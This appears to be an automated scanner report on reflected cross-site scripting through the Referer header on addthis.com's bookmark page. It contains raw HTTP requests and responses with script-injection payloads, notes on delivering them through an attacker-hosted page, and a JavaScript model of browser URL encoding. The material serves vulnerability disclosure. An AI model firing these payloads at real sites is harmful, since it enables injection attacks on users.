Referer: http://www.google.com/search?hl=en&q=94d3e<script>alert(1)</script>25b5f647a99
Response
HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 18:19:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92194
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>94d3e<script>alert(1)</script>25b5f647a99 - Google search</h4> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b45"><script>alert(1)</script>aa36591d24d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability. The Referer header is, however, partly attacker-controlled even without such a technique: an attacker can host a page at a URL whose query string carries the payload and link the victim to /bookmark.php, and the browser sends that URL as the Referer. Whether the payload arrives intact then depends on the victim's browser. A browser that follows the WHATWG URL standard percent-encodes <, > and " in the query before sending, so those characters only reach the attribute as markup if the application URL-decodes the header before echoing it; older browsers sent them unencoded, as this probe did.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c3b45"><script>alert(1)</script>aa36591d24d
Response
HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 18:19:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 92208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=c3b45"><script>alert(1)</script>aa36591d24d" /> ...[SNIP]...
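The exploitability question raised in both Referer findings above (the plain-text and the attribute reflection on /bookmark.php), as an added example that is not code from the report or from addthis.com. It uses Node's WHATWG-conformant URL class as a stand-in for a modern browser to show what Referer would actually be sent for an attacker-hosted page whose URL carries the report's payload, and then contrasts two assumed server behaviours, echoing the header verbatim versus URL-decoding it first, to show which one turns the encoded header back into live markup. The echo templates are assumptions modelled on the <h4> line in the response above.

```javascript
// Added example, not code from the report or from addthis.com. It checks the
// practical exploitability of the two Referer findings above: an attacker can
// only put a payload into the victim's Referer by hosting a page at a URL that
// carries it, and the browser serialises that URL before sending it.
'use strict';

// Referer a browser that follows the WHATWG URL standard sends for a document
// at `pageUrl` (fragment and credentials are never sent). Node's URL class
// applies the same serialisation, so it stands in for the browser here.
function refererSentBy(pageUrl) {
  const u = new URL(pageUrl);
  u.hash = '';
  u.username = '';
  u.password = '';
  return u.href;
}

// Assumed server behaviour, two variants modelled on the <h4> in the response
// above: the page echoes the header verbatim, or it URL-decodes it first.
// Only the second lets a percent-encoded Referer turn back into markup.
function echoVerbatim(referer) {
  return '<h4>' + referer + ' - Google search</h4>';
}
function echoDecoded(referer) {
  return '<h4>' + decodeURIComponent(referer) + ' - Google search</h4>';
}

// Does a rendered fragment contain the report's canary as live markup?
function containsLiveScript(html) {
  return html.includes('<script>alert(1)</script>');
}

// Constructed attacker page URL carrying the first addthis payload.
const attackerPage =
  'http://www.google.com/search?hl=en&q=94d3e<script>alert(1)</script>25b5f647a99';
```

For this page URL the serialised Referer is http://www.google.com/search?hl=en&q=94d3e%3Cscript%3Ealert(1)%3C/script%3E25b5f647a99: the verbatim echo no longer contains a script element, while the decoding echo does, and the raw header the scanner sent (what older browsers transmitted) is live in either case. The practical check for a Referer reflection is therefore whether the application decodes the header, and whether the target population still runs browsers that send these characters raw.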
Report generated by XSS.CX at Thu Dec 16 13:30:09 EST 2010.